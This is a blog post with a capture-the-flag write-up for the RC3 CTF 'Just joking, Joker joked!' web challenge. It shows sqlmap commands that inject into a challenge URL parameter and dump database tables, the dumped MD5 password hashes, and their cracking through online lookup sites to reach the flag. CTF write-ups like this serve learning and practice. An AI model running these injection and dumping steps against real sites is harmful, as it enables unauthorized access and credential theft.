|    |    |    | Today: 29-Apr-2017 |

[Write-up] RC3 CTF : Just joking, Joker joked!

November 22, 2016 | Posted in How to

Tittle : "Just joking," Joker joked!
Category : Web
Point : 200
Description :


Yes, that is gramatically correct. Now who doesn't love a good book and an even better villain?


https://ctf.rc3.club:2010/


With Love,


Joker xx


Hint:


200: Flags aren't in plaintext


====================

[POC]


At first saw this challenge, not knowing should be doing what.

Let's cheat using sqlmap tools to figure out the database inside.


$ sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=" --dbs


After obtaining the desired database then it should look at the table what is there inside.

$ sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=" --tables


Database: CCNs
[2 tables]
| basic
| secrets


There is already a table of desired, time to see the contents of the table.


Let's dump the tables!


$ sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=" -D CCNs -T basic,secrets --dump

Database: CCNs
Table: basic
[4 entries]
| id - name - gender
| 1 - Harley Quinn - Female
| 2 - Riddler - ?
| 3 - Joker - HAHAHA
| 5 - Two-Face - Male


Database: CCNs
Table: secrets
[4 entries]
| id - User - Password
| 1 - Admin - 3118dd54268acb0f04a048fd090e14f7
| 2 - Guy - c9846fa3e401252cf822a21ecf6a567e
| 3 - Joker - c417fccfc5d5a288243c96359c62c381
| 4 - Colonel - adac9d4711cd21cc4cec1b0f8e7ca538


In the hint that "flags aren’t in plaintext" so let’s decrypt this hash.


Sometimes it takes a very long time to decrypt this password hash.



Let’s see if any online databases have the other hashes.


Result from hash-killer.com 3118dd54268acb0f04a048fd090e14f7 -> NiceTry
Result from md5decryption.com c9846fa3e401252cf822a21ecf6a567e -> InfectiousLaughter
Result from md5decryption.com c417fccfc5d5a288243c96359c62c381 -> RC3-2016-HAHAHAHA
Result from md5decryption.com adac9d4711cd21cc4cec1b0f8e7ca538 -> TheRealSanders


That's it ! Flag is RC3-2016-HAHAHAHA

Taged in: ctf, rc3ctf, sqlmap, Web, writeup